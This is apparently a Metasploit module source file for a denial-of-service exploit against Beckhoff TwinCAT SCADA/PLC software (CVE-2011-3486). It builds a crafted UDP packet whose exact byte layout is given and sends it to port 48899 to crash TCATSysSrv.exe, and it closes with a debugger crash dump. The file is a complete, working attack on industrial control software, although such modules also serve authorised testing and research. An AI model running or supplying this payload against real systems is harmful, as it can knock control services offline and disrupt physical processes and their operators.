Path: blob/master/modules/auxiliary/dos/scada/beckhoff_twincat.rb
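##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Denial-of-service module for Beckhoff TwinCAT <= 2.11.0.2004 (CVE-2011-3486).
#
# A single crafted UDP datagram sent to the TwinCAT system service
# (TCATSysSrv.exe, UDP/48899) crashes the service. The crash dump at the
# bottom of this file shows an access violation on a read in the recvfrom()
# handler. There is no result to check: a successful run simply sends the
# packet; whether the target actually went down has to be observed out of band.
#
# Stability: CRASH_SERVICE_DOWN. On a PLC this service is part of the
# control system, so only use this against hosts you are authorized to
# take offline.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',
        'Description' => %q{
          The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending
          a crafted UDP packet to port 48899 (TCATSysSrv.exe).
        },
        'Author' => [
          'Luigi Auriemma', # Public exploit
          'jfa', # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-3486' ],
          [ 'OSVDB', '75495' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]
        ],
        'DisclosureDate' => '2011-09-13',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # TCATSysSrv.exe listens on UDP/48899; RHOSTS comes from the Udp mixin.
    register_options([Opt::RPORT(48899)])
  end

  # Sends the crash trigger once. The socket is released in an `ensure`
  # so that an exception raised by the send does not leave it open.
  def run
    connect_udp
    begin
      print_status('Sending DoS packet ...')
      udp_sock.put(dos_packet)
    ensure
      disconnect_udp
    end
  end

  private

  # Builds the malformed datagram from the original PoC:
  #   4-byte prefix "\x03\x66\x14\x71", 16 zero bytes, then 1514 bytes of 0xff.
  # NOTE(review): the prefix presumably is a fixed header/magic the service
  # expects before parsing; the advisory linked in References describes the
  # layout. The byte sequence is kept exactly as in the original module.
  def dos_packet
    "\x03\x66\x14\x71" + "\x00" * 16 + "\xff" * 1514
  end
end

=begin
0:017> g
(4d4.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=00000001
eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe
TCATSysSrv+0x14f6a:
00414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=????
0:016> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02a0f7f8 71ab265b TCATSysSrv+0x14f6a
02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21
02a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b
02a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc
02a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c
02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d
02a0f96c 00414b92 WSOCK32!recvfrom+0x39
02a0f988 00000000 TCATSysSrv+0x14b92
=end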